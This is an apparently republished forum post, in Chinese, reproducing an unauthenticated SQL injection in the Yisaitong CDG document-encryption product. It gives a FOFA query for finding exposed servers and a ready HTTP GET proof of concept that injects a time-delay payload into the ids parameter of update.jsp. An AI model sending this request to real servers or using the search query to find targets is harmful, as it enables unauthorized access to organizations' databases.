ToB企服应用市场:ToB评测及商务社交产业平台

标题: 亿赛通电子文档安全管理体系 SQL注入漏洞复现 [打印本页]

作者: 篮之新喜    时间: 2024-8-12 23:19
标题: 亿赛通电子文档安全管理体系 SQL注入漏洞复现
0x01 产品简介

亿赛通电子文档安全管理体系(简称:CDG)是一款电子文档安全加密软件,该体系利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法盗取企业核心重要数据资产,对电子文档进行全生命周期防护,体系具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部分涉密程度的差别(如核心部分和普通部分),摆设力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄漏体系,使得成本、效率和安全三者到达平衡,实现电子文档的数据安全。
0x02 漏洞概述

由于亿赛通电子文档安全管理体系 /update.jsp处的ids参数处对传入的数据没有预编译和富足的校验,导致该接口存在SQL注入漏洞,未授权的攻击者可获取数据库敏感信息。
0x03 复现环境

FOFA:app="亿赛通-电子文档安全管理体系"

0x04 漏洞复现

PoC
  1. GET /CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1%2C3%29%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1
  2. Host: your-ip
复制代码
PS:延时注入并非返回正常时间差


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4